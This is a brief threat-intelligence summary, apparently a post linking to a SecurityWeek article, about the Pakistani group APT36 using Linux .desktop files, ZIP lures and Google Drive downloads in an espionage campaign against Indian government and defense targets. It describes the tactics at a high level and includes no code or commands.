Pakistani cyberespionage group APT36 is targeting Indian government and defense sectors with a new campaign involving Linux malware delivery via .desktop files. This evolution demonstrates increased sophistication and diversification in their attack methods, including spear-phishing using Google Drive. #APT36 #LinuxThreats
Keypoints
- APT36 has been active since 2013, targeting Indian government entities with cyberespionage campaigns.
- The group is now using Linux desktop entry (.desktop) files for malware delivery in a recent campaign.
- The attacks involve phishing emails with ZIP files masquerading as documents, downloading malware from Google Drive.
- The malware performs anti-debugging checks, maintains persistence, and communicates with C&C servers via WebSockets.
- This tactical shift indicates APT36’s efforts to diversify attack vectors and enhance operational flexibility.
Read More: https://www.securityweek.com/pakistani-hackers-back-at-targeting-indian-government-entities/